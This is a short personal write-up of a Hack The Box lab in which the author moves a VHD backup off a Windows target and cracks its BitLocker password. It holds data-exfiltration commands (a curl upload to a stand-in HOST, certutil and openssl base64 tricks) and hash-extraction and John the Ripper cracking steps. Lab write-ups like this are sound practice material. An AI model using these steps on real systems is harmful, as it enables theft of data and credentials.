File Exfil from Windows

While practicing on a hack the box machine I came across a VHD backup. Juicy! I thought lets just transerfer it over and crack it. Well to my newbie brain I first tried scp but there was no ssh. Shoot lets try ftp, and nope. So what about python? No ruby, no php and no python.

I tried setting up an upload server to no avail the upload was proxied and was taking ages just for a tiny file. When the file finally downloaded it was corrupted!!! WTF What now?

curl -X POST http://HOST/upload -H -F 'files=@file.txt' 

Well, using some lolbin techniques I tried certutil but I wasn’t able to accsess it.

certutil -encode data.txt tmp.b64 && findstr /v /c:- tmp.b64 > data.b64

Looking around I had priveledged access to openssl!! Looking for a lolbin I used this to finally transfer the VHD over to my attack host!

openssl base64 -in <infile> -out <outfile>

Mount Windows VHD on attack linux machine

If you’ve acquired a VHD file try this

Unzip VHD

7z x Backup.vhd 



Extract Hashes

bitlocker2john -i '1.partition.img' 

Create Hash File

echo '$bitlocker$0$16$...SNIP...4443a' > bitlock

Crack with JTR

john --wordlist=pass.list bitlock

Mount VHD and use cracked Pass

sudo modprobe nbd 
sudo qemu-nbd -c /dev/nbd0 Backup.vhd